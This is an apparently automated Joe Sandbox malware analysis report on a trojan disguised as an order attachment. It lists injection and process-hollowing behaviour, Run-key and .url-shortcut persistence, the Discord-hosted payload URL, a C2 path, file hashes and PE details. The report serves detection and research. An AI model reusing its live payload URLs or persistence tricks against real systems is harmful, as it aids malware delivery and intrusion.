          Default AccountsScheduled Task/JobDLL Side-Loading1Registry Run Keys / Startup Folder1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery231Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Process Injection812Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 553139 Sample: Nova narudzba u prilogu.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 53 Multi AV Scanner detection for domain / URL 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 5 other signatures 2->59 10 Nova narudzba u prilogu.exe 1 17 2->10         started        process3 dnsIp4 51 cdn.discordapp.com 162.159.135.233, 443, 49774, 49775 CLOUDFLARENETUS United States 10->51 41 C:\Users\user\Contacts\Ajshkennyc.exe, PE32 10->41 dropped 43 C:\Users\...\Ajshkennyc.exe:Zone.Identifier, ASCII 10->43 dropped 77 Writes to foreign memory regions 10->77 79 Allocates memory in foreign processes 10->79 81 Creates a thread in another existing process (thread injection) 10->81 83 Injects a PE file into a foreign processes 10->83 15 DpiScaling.exe 10->15         started        file5 signatures6 process7 signatures8 93 Modifies the context of a thread in another process (thread injection) 15->93 95 Maps a DLL or memory area into another process 15->95 97 Sample uses process hollowing technique 15->97 99 2 other signatures 15->99 18 explorer.exe 4 2 15->18 injected process9 process10 20 Ajshkennyc.exe 13 18->20         started        24 Ajshkennyc.exe 14 18->24         started        26 colorcpl.exe 18->26         started        28 msdt.exe 18->28         started        dnsIp11 45 cdn.discordapp.com 20->45 61 Multi AV Scanner detection for dropped file 20->61 63 Machine Learning detection for dropped file 20->63 65 Writes to foreign memory regions 20->65 30 DpiScaling.exe 20->30         started        47 162.159.134.233, 443, 49779 CLOUDFLARENETUS United States 24->47 49 cdn.discordapp.com 24->49 67 Creates a thread in another existing process (thread injection) 24->67 69 Injects a PE file into a foreign processes 24->69 33 logagent.exe 24->33         started        71 Modifies the context of a thread in another process (thread injection) 26->71 73 Maps a DLL or memory area into another process 26->73 75 Tries to detect virtualization through RDTSC time measurements 26->75 35 cmd.exe 1 26->35         started        37 explorer.exe 144 26->37         started        signatures12 process13 signatures14 85 Modifies the context of a thread in another process (thread injection) 30->85 87 Maps a DLL or memory area into another process 30->87 89 Sample uses process hollowing technique 30->89 91 Tries to detect virtualization through RDTSC time measurements 33->91 39 conhost.exe 35->39         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Nova narudzba u prilogu.exe33%ReversingLabsWin32.Trojan.Phonzy
          Nova narudzba u prilogu.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\Contacts\Ajshkennyc.exe100%Joe Sandbox ML
          C:\Users\user\Contacts\Ajshkennyc.exe28%VirustotalBrowse
          C:\Users\user\Contacts\Ajshkennyc.exe33%ReversingLabsWin32.Trojan.Phonzy

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          26.2.explorer.exe.bc3796c.1.unpack100%AviraTR/Patched.Ren.Gen8Download File
          15.0.DpiScaling.exe.72480000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          15.0.DpiScaling.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.DpiScaling.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          20.0.logagent.exe.72480000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          16.2.colorcpl.exe.2a94670.1.unpack100%AviraTR/Patched.Ren.Gen8Download File
          20.0.logagent.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          15.0.DpiScaling.exe.72480000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.DpiScaling.exe.72480000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.DpiScaling.exe.72480000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          26.0.explorer.exe.bc3796c.1.unpack100%AviraTR/Patched.Ren.Gen8Download File
          20.0.logagent.exe.72480000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          16.2.colorcpl.exe.4ce796c.4.unpack100%AviraTR/Patched.Ren.Gen8Download File
          20.0.logagent.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          15.0.DpiScaling.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.DpiScaling.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          15.2.DpiScaling.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          20.2.logagent.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.DpiScaling.exe.72480000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.finetipster.com/pvxz/5%VirustotalBrowse
          www.finetipster.com/pvxz/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cdn.discordapp.com
          162.159.135.233
          truefalse
            high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            www.finetipster.com/pvxz/true
            • 5%, Virustotal, Browse
            • Avira URL Cloud: safe
            low
            https://cdn.discordapp.com/attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvrfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              162.159.135.233
              cdn.discordapp.comUnited States
              13335CLOUDFLARENETUSfalse
              162.159.134.233
              unknownUnited States
              13335CLOUDFLARENETUSfalse

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:553139
              Start date:14.01.2022
              Start time:11:24:24
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 13m 54s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:Nova narudzba u prilogu.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:29
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@17/6@3/2
              EGA Information:
              • Successful, ratio: 40%
              HDC Information:
              • Successful, ratio: 100% (good quality ratio 87.4%)
              • Quality average: 72%
              • Quality standard deviation: 33.1%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 20.189.173.21
              • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, s-ring.msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com, t-ring.msedge.net
              • Execution Graph export aborted for target Ajshkennyc.exe, PID 6912 because there are no executed function
              • Execution Graph export aborted for target Ajshkennyc.exe, PID 6980 because there are no executed function
              • Execution Graph export aborted for target Nova narudzba u prilogu.exe, PID 7148 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtEnumerateValueKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              11:25:29API Interceptor1x Sleep call for process: Nova narudzba u prilogu.exe modified
              11:25:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ajshkennyc C:\Users\user\Contacts\cynnekhsjA.url
              11:25:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ajshkennyc C:\Users\user\Contacts\cynnekhsjA.url
              11:26:07API Interceptor2x Sleep call for process: Ajshkennyc.exe modified
              11:27:14API Interceptor61x Sleep call for process: explorer.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Ajshkennychvrlvyqvxklxbhfqfzgvr[1]
              Process:C:\Users\user\Contacts\Ajshkennyc.exe
              File Type:data
              Category:dropped
              Size (bytes):466432
              Entropy (8bit):7.977463072636226
              Encrypted:false
              SSDEEP:12288:a1D9aW3caXE2jviRul82V3DhCpxqZ03OGS6JbJgf6C8O:a1D7npl8+DhC4i3QNR
              MD5:160F746C3471A01D756CD5438AE7899D
              SHA1:F5DAF3346BD12E70AAEC61F57F7552B76605BD4D
              SHA-256:4894806885D8A3CBE4D61EEDDED3C93C1D65679D6C785FD7DF01FDFEC855B009
              SHA-512:D7B4506110D462F978A0CFB65AEFD7DF966F551257A85DABFA998A297ECD0B1D09875C726A4113CA411CBB967F613738C669C3F9FDE558F06FB9BF7A0A62E393
              Malicious:false
              Reputation:unknown
              Preview: ...9".J[..W.6..j.9(.S..w...9'n...FJO....s./......O..].".Q.h.......K...m.....t0.|3.l..d.I../.0...a....`r-.M....#t8..e.NU...]..^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*...7(..b.U....^|;:.%s.....I.~6.{......c........#g...s..e.~-$....S.+bk..x).O..Y.....P)r<....#g.tX...fc.6.C+..HW..s....zF3....X~,.P<..w..Q...G...w...r7....|#`.FPK..,.y...N>.]..'g....XLt:..<..M..... ...LB.bdo..#m..|*.e.(.....M.p93v95.flg....]...B..'g..-. N..j...W.btk?.B..*8z.pw..n..~..Gf..l...h....UOu..t.O...K.2T.L...\....N.1.-.,y^.f.. ..,f..#..-.........b...z.@..*`.a..lm......]...c.+.....\y.....?....2Q2h.B...z.F..@...Ik....N.2.&R.w........z..~...Sx....S{..D..i...G.w....s..r.o-..WMp..Sd.*.R....p..v..7..i-..h..>...s..C.w.|.._\..Z.[T.St... @.x.Z.aL..;.s.z.Ov.k:...=.p..8.f.....*'..}.....P.l...D...u.......g).c!.Oy.aP...YQ......5...f......i.+......+0ek.i:.f&.U^........N.....p......D`.ob.....,-...;.t.i/.m%.[UN...N../....v.v.....A..+.0,;.Gu.s..C.h...z..5............
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Ajshkennychvrlvyqvxklxbhfqfzgvr[2]
              Process:C:\Users\user\Contacts\Ajshkennyc.exe
              File Type:data
              Category:dropped
              Size (bytes):466432
              Entropy (8bit):7.977463072636226
              Encrypted:false
              SSDEEP:12288:a1D9aW3caXE2jviRul82V3DhCpxqZ03OGS6JbJgf6C8O:a1D7npl8+DhC4i3QNR
              MD5:160F746C3471A01D756CD5438AE7899D
              SHA1:F5DAF3346BD12E70AAEC61F57F7552B76605BD4D
              SHA-256:4894806885D8A3CBE4D61EEDDED3C93C1D65679D6C785FD7DF01FDFEC855B009
              SHA-512:D7B4506110D462F978A0CFB65AEFD7DF966F551257A85DABFA998A297ECD0B1D09875C726A4113CA411CBB967F613738C669C3F9FDE558F06FB9BF7A0A62E393
              Malicious:false
              Reputation:unknown
              Preview: ...9".J[..W.6..j.9(.S..w...9'n...FJO....s./......O..].".Q.h.......K...m.....t0.|3.l..d.I../.0...a....`r-.M....#t8..e.NU...]..^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*...7(..b.U....^|;:.%s.....I.~6.{......c........#g...s..e.~-$....S.+bk..x).O..Y.....P)r<....#g.tX...fc.6.C+..HW..s....zF3....X~,.P<..w..Q...G...w...r7....|#`.FPK..,.y...N>.]..'g....XLt:..<..M..... ...LB.bdo..#m..|*.e.(.....M.p93v95.flg....]...B..'g..-. N..j...W.btk?.B..*8z.pw..n..~..Gf..l...h....UOu..t.O...K.2T.L...\....N.1.-.,y^.f.. ..,f..#..-.........b...z.@..*`.a..lm......]...c.+.....\y.....?....2Q2h.B...z.F..@...Ik....N.2.&R.w........z..~...Sx....S{..D..i...G.w....s..r.o-..WMp..Sd.*.R....p..v..7..i-..h..>...s..C.w.|.._\..Z.[T.St... @.x.Z.aL..;.s.z.Ov.k:...=.p..8.f.....*'..}.....P.l...D...u.......g).c!.Oy.aP...YQ......5...f......i.+......+0ek.i:.f&.U^........N.....p......D`.ob.....,-...;.t.i/.m%.[UN...N../....v.v.....A..+.0,;.Gu.s..C.h...z..5............
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Ajshkennychvrlvyqvxklxbhfqfzgvr[1]
              Process:C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              File Type:data
              Category:dropped
              Size (bytes):466432
              Entropy (8bit):7.977463072636226
              Encrypted:false
              SSDEEP:12288:a1D9aW3caXE2jviRul82V3DhCpxqZ03OGS6JbJgf6C8O:a1D7npl8+DhC4i3QNR
              MD5:160F746C3471A01D756CD5438AE7899D
              SHA1:F5DAF3346BD12E70AAEC61F57F7552B76605BD4D
              SHA-256:4894806885D8A3CBE4D61EEDDED3C93C1D65679D6C785FD7DF01FDFEC855B009
              SHA-512:D7B4506110D462F978A0CFB65AEFD7DF966F551257A85DABFA998A297ECD0B1D09875C726A4113CA411CBB967F613738C669C3F9FDE558F06FB9BF7A0A62E393
              Malicious:false
              Reputation:unknown
              Preview: ...9".J[..W.6..j.9(.S..w...9'n...FJO....s./......O..].".Q.h.......K...m.....t0.|3.l..d.I../.0...a....`r-.M....#t8..e.NU...]..^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*...7(..b.U....^|;:.%s.....I.~6.{......c........#g...s..e.~-$....S.+bk..x).O..Y.....P)r<....#g.tX...fc.6.C+..HW..s....zF3....X~,.P<..w..Q...G...w...r7....|#`.FPK..,.y...N>.]..'g....XLt:..<..M..... ...LB.bdo..#m..|*.e.(.....M.p93v95.flg....]...B..'g..-. N..j...W.btk?.B..*8z.pw..n..~..Gf..l...h....UOu..t.O...K.2T.L...\....N.1.-.,y^.f.. ..,f..#..-.........b...z.@..*`.a..lm......]...c.+.....\y.....?....2Q2h.B...z.F..@...Ik....N.2.&R.w........z..~...Sx....S{..D..i...G.w....s..r.o-..WMp..Sd.*.R....p..v..7..i-..h..>...s..C.w.|.._\..Z.[T.St... @.x.Z.aL..;.s.z.Ov.k:...=.p..8.f.....*'..}.....P.l...D...u.......g).c!.Oy.aP...YQ......5...f......i.+......+0ek.i:.f&.U^........N.....p......D`.ob.....,-...;.t.i/.m%.[UN...N../....v.v.....A..+.0,;.Gu.s..C.h...z..5............
              C:\Users\user\Contacts\Ajshkennyc.exe
              Process:C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):738816
              Entropy (8bit):6.972052229858851
              Encrypted:false
              SSDEEP:12288:Qeqc6W06QqRStGo6fb8KB3dvrwMangTdALUBR39OXqgu:QNHWUqRSgjb39Z5EgTdAIBh9O9
              MD5:97D7BF836142B0EBB1EBFC1A4173DC9D
              SHA1:DC734D5D74BEE644FB1028EDE0ADCD34BE3F98F8
              SHA-256:FEB40C343AA65F5F5C0A32443535EFFA22652067C576416857E4D7280CE85E11
              SHA-512:A4E57F5C187D4E8F3FBB62739DEE6496A7011A76286A824D1770A6C050825F67C01194FA2776A5FA7781C524A3281C783DCBF902A3733256DF9E8AD5C586D9AE
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Virustotal, Detection: 28%, Browse
              • Antivirus: ReversingLabs, Detection: 33%
              Reputation:unknown
              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*................. ..."......./.......0....@..............................................@..............................T$...p...6.......................u..................................................................................CODE....l........ .................. ..`DATA.....M...0...N...$..............@...BSS..................r...................idata..T$.......&...r..............@....tls.....................................rdata..............................@..P.reloc...u.......v..................@..P.rsrc....6...p...6..................@..P.....................F..............@..P........................................................................................................................................
              C:\Users\user\Contacts\Ajshkennyc.exe:Zone.Identifier
              Process:C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:unknown
              Preview: [ZoneTransfer]....ZoneId=0
              C:\Users\user\Contacts\cynnekhsjA.url
              Process:C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Contacts\\Ajshkennyc.exe">), ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):100
              Entropy (8bit):4.840309101188316
              Encrypted:false
              SSDEEP:3:HRAbABGQYmTWAX+Ro4EE8WxLv4bsGKdxRoPov:HRYFVmTWDKFZwEsbxWQv
              MD5:DD4AFC0413AF15F651CC1ED3EA3997F5
              SHA1:66530FD490B98743D13B7F7B2C823E4CE0F3A008
              SHA-256:15E3A4B9AC8E25D6F78C0892D5D12BB9EC68B603F8423F753E7CB684EADCEEDB
              SHA-512:26D4AAD56F3C64C2DD9A2CA01D687AAFE12378B1074AF086A1A05B434614A4039FF45C472FE72C0FA9F779BB233E0E50C00C1771B1A3B7BA7692FB6CEC1E47B6
              Malicious:false
              Yara Hits:
              • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\cynnekhsjA.url, Author: @itsreallynick (Nick Carr)
              • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\cynnekhsjA.url, Author: @itsreallynick (Nick Carr)
              Reputation:unknown
              Preview: [InternetShortcut]..URL=file:"C:\\Users\\user\\Contacts\\Ajshkennyc.exe"..IconIndex=99..HotKey=24..

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.972052229858851
              TrID:
              • Win32 Executable (generic) a (10002005/4) 87.62%
              • Win32 Executable Borland Delphi 7 (665061/41) 5.83%
              • Win32 Executable Borland Delphi 5 (451725/56) 3.96%
              • Win32 Executable Borland Delphi 6 (262906/60) 2.30%
              • Win32 Executable Delphi generic (14689/80) 0.13%
              File name:Nova narudzba u prilogu.exe
              File size:738816
              MD5:97d7bf836142b0ebb1ebfc1a4173dc9d
              SHA1:dc734d5d74bee644fb1028ede0adcd34be3f98f8
              SHA256:feb40c343aa65f5f5c0a32443535effa22652067c576416857e4d7280ce85e11
              SHA512:a4e57f5c187d4e8f3fbb62739dee6496a7011a76286a824d1770a6c050825f67c01194fa2776a5fa7781c524a3281c783dcbf902a3733256df9e8ad5c586d9ae
              SSDEEP:12288:Qeqc6W06QqRStGo6fb8KB3dvrwMangTdALUBR39OXqgu:QNHWUqRSgjb39Z5EgTdAIBh9O9
              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

              File Icon

              Icon Hash:e4eea286a4b4bcb4

              Static PE Info

              General

              Entrypoint:0x472f00
              Entrypoint Section:CODE
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              DLL Characteristics:
              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:83fa98b20d271465e919fa2cd4b97fe2

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              add esp, FFFFFFF0h
              mov eax, 00472C68h
              call 00007F4110FC5009h
              mov eax, dword ptr [00477C30h]
              mov eax, dword ptr [eax]
              call 00007F4111013385h
              mov eax, dword ptr [00477C30h]
              mov eax, dword ptr [eax]
              mov edx, 00472F60h
              call 00007F4111012F74h
              mov ecx, dword ptr [004779C4h]
              mov eax, dword ptr [00477C30h]
              mov eax, dword ptr [eax]
              mov edx, dword ptr [0047278Ch]
              call 00007F4111013374h
              mov eax, dword ptr [00477C30h]
              mov eax, dword ptr [eax]
              call 00007F41110133E8h
              call 00007F4110FC2C2Fh
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x7a0000x2454.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x870000x33600.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x751c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x7e0000x18.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              CODE0x10000x71f6c0x72000False0.526793362802data6.58760669277IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              DATA0x730000x4dec0x4e00False0.681039663462data6.4891117235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              BSS0x780000x11990x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .idata0x7a0000x24540x2600False0.354749177632data4.91425665451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .tls0x7d0000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rdata0x7e0000x180x200False0.048828125data0.20058190744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .reloc0x7f0000x751c0x7600False0.622715836864data6.67905610696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .rsrc0x870000x336000x33600False0.468441111618data6.86288519594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_CURSOR0x87c680x134data
              RT_CURSOR0x87d9c0x134data
              RT_CURSOR0x87ed00x134data
              RT_CURSOR0x880040x134data
              RT_CURSOR0x881380x134data
              RT_CURSOR0x8826c0x134data
              RT_CURSOR0x883a00x134data
              RT_BITMAP0x884d40x1d0data
              RT_BITMAP0x886a40x1e4data
              RT_BITMAP0x888880x1d0data
              RT_BITMAP0x88a580x1d0data
              RT_BITMAP0x88c280x1d0data
              RT_BITMAP0x88df80x1d0data
              RT_BITMAP0x88fc80x1d0data
              RT_BITMAP0x891980x1d0data
              RT_BITMAP0x893680x1d0data
              RT_BITMAP0x895380x1d0data
              RT_BITMAP0x897080xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
              RT_ICON0x897f00x25a8data
              RT_ICON0x8bd980x10a8data
              RT_ICON0x8ce400x468GLS_BINARY_LSB_FIRST
              RT_DIALOG0x8d2a80x52data
              RT_STRING0x8d2fc0x2e0data
              RT_STRING0x8d5dc0xc14data
              RT_STRING0x8e1f00x3e4data
              RT_STRING0x8e5d40x1dcdata
              RT_STRING0x8e7b00x154data
              RT_STRING0x8e9040x240data
              RT_STRING0x8eb440x184data
              RT_STRING0x8ecc80xe8data
              RT_STRING0x8edb00x138data
              RT_STRING0x8eee80x3ecdata
              RT_STRING0x8f2d40x398data
              RT_STRING0x8f66c0x3a4data
              RT_STRING0x8fa100x3e8data
              RT_STRING0x8fdf80xf4data
              RT_STRING0x8feec0xc4data
              RT_STRING0x8ffb00x2c0data
              RT_STRING0x902700x478data
              RT_STRING0x906e80x3acdata
              RT_STRING0x90a940x2d4data
              RT_RCDATA0x90d680x10data
              RT_RCDATA0x90d780x36cdata
              RT_RCDATA0x910e40x96aRIFF (little-endian) data, WAVE audio, MPEG Layer 3, mono 11025 HzEnglishUnited States
              RT_RCDATA0x91a500x866RIFF (little-endian) data, WAVE audio, MPEG Layer 3, mono 11025 HzEnglishUnited States
              RT_RCDATA0x922b80x27fe2RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 22050 HzEnglishUnited States
              RT_RCDATA0xba29c0x227Delphi compiled form 'TFrmAbout'
              RT_GROUP_CURSOR0xba4c40x14Lotus unknown worksheet or configuration, revision 0x1
              RT_GROUP_CURSOR0xba4d80x14Lotus unknown worksheet or configuration, revision 0x1
              RT_GROUP_CURSOR0xba4ec0x14Lotus unknown worksheet or configuration, revision 0x1
              RT_GROUP_CURSOR0xba5000x14Lotus unknown worksheet or configuration, revision 0x1
              RT_GROUP_CURSOR0xba5140x14Lotus unknown worksheet or configuration, revision 0x1
              RT_GROUP_CURSOR0xba5280x14Lotus unknown worksheet or configuration, revision 0x1
              RT_GROUP_CURSOR0xba53c0x14Lotus unknown worksheet or configuration, revision 0x1
              RT_GROUP_ICON0xba5500x30data

              Imports

              DLLImport
              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
